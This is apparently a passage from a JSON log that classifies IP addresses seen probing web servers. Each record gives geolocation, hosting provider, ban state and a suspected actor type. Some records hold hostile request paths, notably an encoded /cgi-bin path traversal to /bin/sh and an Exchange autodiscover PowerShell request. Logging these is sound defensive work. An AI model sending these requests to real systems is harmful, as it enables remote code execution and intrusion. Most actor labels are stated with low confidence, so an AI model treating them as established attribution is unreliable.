   "ip": "170.64.131.170",
   "country": "Australia",
   "cc": "AU",
   "city": "Alexandria",
   "lat": -33.9088,
   "lon": 151.196,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T02:32:00+02:00",
   "last_seen": "2026-10-04T02:32:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-04"
   ]
  },
  {
   "ip": "170.64.214.139",
   "country": "Australia",
   "cc": "AU",
   "city": "Alexandria",
   "lat": -33.9088,
   "lon": 151.196,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T18:48:00+02:00",
   "last_seen": "2026-10-03T18:48:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-04"
   ]
  },
  {
   "ip": "172.68.183.22",
   "country": "Sweden",
   "cc": "SE",
   "city": "Stockholm",
   "lat": 59.3327,
   "lon": 18.0656,
   "asn": 13335,
   "org": "Cloudflare, Inc.",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T19:18:00+02:00",
   "last_seen": "2026-10-03T19:18:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "cdn-edge"
   ],
   "paths": [],
   "actor": {
    "label": "CDN edge relaying an attack (true origin hidden)",
    "confidence": "high",
    "evidence": [
     "AS13335 Cloudflare is a CDN; the real client is behind it"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "173.239.213.16",
   "country": "United States",
   "cc": "US",
   "city": "Atlanta",
   "lat": 33.7501,
   "lon": -84.3885,
   "asn": 62240,
   "org": "Clouvider Limited",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T05:54:00+02:00",
   "last_seen": "2026-10-04T05:54:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "178.128.151.198",
   "country": "United States",
   "cc": "US",
   "city": "North Bergen",
   "lat": 40.8054,
   "lon": -74.0241,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T19:07:00+02:00",
   "last_seen": "2026-10-03T19:07:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05"
   ]
  },
  {
   "ip": "185.221.237.197",
   "country": "Germany",
   "cc": "DE",
   "city": "Frankfurt am Main",
   "lat": 50.1109,
   "lon": 8.68213,
   "asn": 212552,
   "org": "BitCommand LLC",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T23:06:00+02:00",
   "last_seen": "2026-10-03T23:06:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "192.241.132.217",
   "country": "United States",
   "cc": "US",
   "city": "North Bergen",
   "lat": 40.8054,
   "lon": -74.0241,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T19:23:00+02:00",
   "last_seen": "2026-10-03T19:23:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "192.3.245.183",
   "country": "United States",
   "cc": "US",
   "city": "Los Angeles",
   "lat": 34.0549,
   "lon": -118.243,
   "asn": 36352,
   "org": "HostPapa",
   "ptr": "192-3-245-183-host.colocrossing.com",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T23:27:00+02:00",
   "last_seen": "2026-10-03T23:27:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05"
   ]
  },
  {
   "ip": "193.32.162.156",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 47890,
   "org": "UNMANAGED LTD",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T00:02:00+02:00",
   "last_seen": "2026-10-04T00:02:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "cluster:193.32.162.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS47890 UNMANAGED LTD (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "3 addresses from 193.32.162.0/24 (AS47890) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-07"
   ]
  },
  {
   "ip": "193.32.162.157",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 47890,
   "org": "UNMANAGED LTD",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T03:18:00+02:00",
   "last_seen": "2026-10-04T03:18:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "cluster:193.32.162.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS47890 UNMANAGED LTD (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "3 addresses from 193.32.162.0/24 (AS47890) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-06"
   ]
  },
  {
   "ip": "196.189.236.67",
   "country": "Ethiopia",
   "cc": "ET",
   "city": "Addis Ababa",
   "lat": 9.02427,
   "lon": 38.7519,
   "asn": 24757,
   "org": "EthioNet",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T05:26:00+02:00",
   "last_seen": "2026-10-04T05:26:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05"
   ]
  },
  {
   "ip": "20.210.186.186",
   "country": "Japan",
   "cc": "JP",
   "city": "Osaka",
   "lat": 34.6937,
   "lon": 135.502,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "php-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T00:07:00+02:00",
   "last_seen": "2026-10-04T00:07:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-04",
    "2026-10-05"
   ]
  },
  {
   "ip": "20.65.144.90",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T02:02:00+02:00",
   "last_seen": "2026-10-04T02:02:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "20.65.171.30",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T18:15:00+02:00",
   "last_seen": "2026-10-03T18:15:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "20.65.217.174",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T01:25:00+02:00",
   "last_seen": "2026-10-04T01:25:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "206.189.225.181",
   "country": "United States",
   "cc": "US",
   "city": "North Bergen",
   "lat": 40.8054,
   "lon": -74.0241,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": "c8021b81a5.scan.leakix.org",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T18:32:00+02:00",
   "last_seen": "2026-10-03T18:32:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS c8021b81a5.scan.leakix.org"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "216.218.206.66",
   "country": "United States",
   "cc": "US",
   "city": "San Ramon",
   "lat": 37.7745,
   "lon": -121.961,
   "asn": 6939,
   "org": "Hurricane Electric LLC",
   "ptr": "scan-05.shadowserver.io",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T02:50:00+02:00",
   "last_seen": "2026-10-04T02:50:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "reverse DNS scan-05.shadowserver.io"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "23.234.72.92",
   "country": "United States",
   "cc": "US",
   "city": "Los Angeles",
   "lat": 34.0549,
   "lon": -118.243,
   "asn": 11878,
   "org": "tzulo, inc.",
   "ptr": "static-23-234-72-92.cust.tzulo.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T23:23:00+02:00",
   "last_seen": "2026-10-03T23:23:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "34.31.120.130",
   "country": "United States",
   "cc": "US",
   "city": "Council Bluffs",
   "lat": 41.2619,
   "lon": -95.8608,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "130.120.31.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T19:40:00+02:00",
   "last_seen": "2026-10-03T19:40:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "35.238.129.244",
   "country": "United States",
   "cc": "US",
   "city": "Council Bluffs",
   "lat": 41.2619,
   "lon": -95.8608,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "244.129.238.35.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T04:05:00+02:00",
   "last_seen": "2026-10-04T04:05:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "40.74.212.136",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T01:26:00+02:00",
   "last_seen": "2026-10-04T01:26:00+02:00",
   "sensors": [
    "web-4"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "45.148.10.95",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T20:26:00+02:00",
   "last_seen": "2026-10-03T20:26:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "52.248.42.25",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T01:29:00+02:00",
   "last_seen": "2026-10-04T01:29:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/autodiscover/autodiscover.json?[[[@]]]zdi/Powershell"
   ],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "82.197.69.56",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore",
   "lat": 1.35208,
   "lon": 103.82,
   "asn": 141995,
   "org": "Contabo Asia Private Limited",
   "ptr": "vmi3543752.contaboserver.net",
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T00:40:00+02:00",
   "last_seen": "2026-10-04T00:40:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "84.233.199.151",
   "country": "United States",
   "cc": "US",
   "city": "New York",
   "lat": 40.7128,
   "lon": -74.006,
   "asn": 212238,
   "org": "Datacamp Limited",
   "ptr": "unn-84-233-199-151.datapacket.com",
   "types": [
    "secret-probe",
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T23:06:00+02:00",
   "last_seen": "2026-10-03T23:06:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [],
   "paths": [
    "/db.sql"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "85.204.70.94",
   "country": "France",
   "cc": "FR",
   "city": "Paris",
   "lat": 48.8575,
   "lon": 2.35138,
   "asn": 25369,
   "org": "Hydra Communications Ltd",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-03T21:28:00+02:00",
   "last_seen": "2026-10-03T21:28:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "91.148.244.131",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Haarlem (Oude Stad)",
   "lat": 52.3894,
   "lon": 4.63245,
   "asn": 34343,
   "org": "Eweka Internet Services B.V.",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-04T02:48:00+02:00",
   "last_seen": "2026-10-04T02:48:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-04",
    "2026-10-05"
   ]
  },
  {
   "ip": "91.193.232.178",
   "country": "United States",
   "cc": "US",
   "city": "Memphis",
   "lat": 35.1495,
   "lon": -90.049,
   "asn": 62240,
   "org": "Clouvider Limited",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T05:54:00+02:00",
   "last_seen": "2026-10-04T05:54:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [],
   "tags": [
    "cluster:91.193.232.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "medium",
    "evidence": [
     "CMS, admin panel or PHP script probing",
     "2 addresses from 91.193.232.0/24 (AS62240) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "94.154.43.125",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3734,
   "lon": 4.89406,
   "asn": 219502,
   "org": "Storm Industries LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T05:52:00+02:00",
   "last_seen": "2026-10-04T05:52:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:94.154.43.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS219502 Storm Industries (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "3 addresses from 94.154.43.0/24 (AS219502) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-07"
   ]
  },
  {
   "ip": "94.154.43.129",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3734,
   "lon": 4.89406,
   "asn": 219502,
   "org": "Storm Industries LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T05:58:00+02:00",
   "last_seen": "2026-10-04T05:58:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:94.154.43.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS219502 Storm Industries (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "3 addresses from 94.154.43.0/24 (AS219502) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "94.154.43.84",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3734,
   "lon": 4.89406,
   "asn": 219502,
   "org": "Storm Industries LLC",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T05:55:00+02:00",
   "last_seen": "2026-10-04T05:55:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:94.154.43.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS219502 Storm Industries (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "3 addresses from 94.154.43.0/24 (AS219502) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "96.126.130.210",
   "country": "Japan",
   "cc": "JP",
   "city": "Osaka",
   "lat": 34.6954,
   "lon": 135.491,
   "asn": 149440,
   "org": "Evoxt Sdn. Bhd.",
   "ptr": "96-126-130-210.aceips.com",
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-04T04:15:00+02:00",
   "last_seen": "2026-10-04T04:15:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-04"
   ]
  },
  {
   "ip": "103.146.203.111",
   "country": "Indonesia",
   "cc": "ID",
   "city": "Cicurug",
   "lat": -6.84206,
   "lon": 106.724,
   "asn": 136052,
   "org": "PT Cloud Hosting Indonesia",
   "ptr": "vps.ekasurya.co.id",
   "types": [
    "php-probe"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-03T18:35:00+02:00",
   "last_seen": "2026-10-03T18:35:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/admin/config.php"
   ],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "144.48.130.71",
   "country": "Pakistan",
   "cc": "PK",
   "city": "Kot Radha Kishan",
   "lat": 31.1707,
   "lon": 74.1013,
   "asn": 9541,
   "org": "Cyber Internet Services (Private) Limited",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-03T19:19:00+02:00",
   "last_seen": "2026-10-03T19:19:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [],
   "paths": [
    "/HNAP1/"
   ],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "172.202.106.160",
   "country": "United States",
   "cc": "US",
   "city": "Des Moines",
   "lat": 41.5868,
   "lon": -93.625,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-04T02:01:00+02:00",
   "last_seen": "2026-10-04T02:01:00+02:00",
   "sensors": [
    "web-4"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/mcp"
   ],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-04"
   ]
  },
  {
   "ip": "187.108.1.142",
   "country": "Brazil",
   "cc": "BR",
   "city": "Joinville",
   "lat": -26.3044,
   "lon": -48.8464,
   "asn": 28267,
   "org": "SIM INTERNET PROVEDORES DE INTERNET EIRELI.",
   "ptr": "as28267.sc.simfibra.com.br",
   "types": [
    "attack-tool"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-03T21:52:00+02:00",
   "last_seen": "2026-10-03T21:52:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "multi-night"
   ],
   "paths": [
    "/"
   ],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
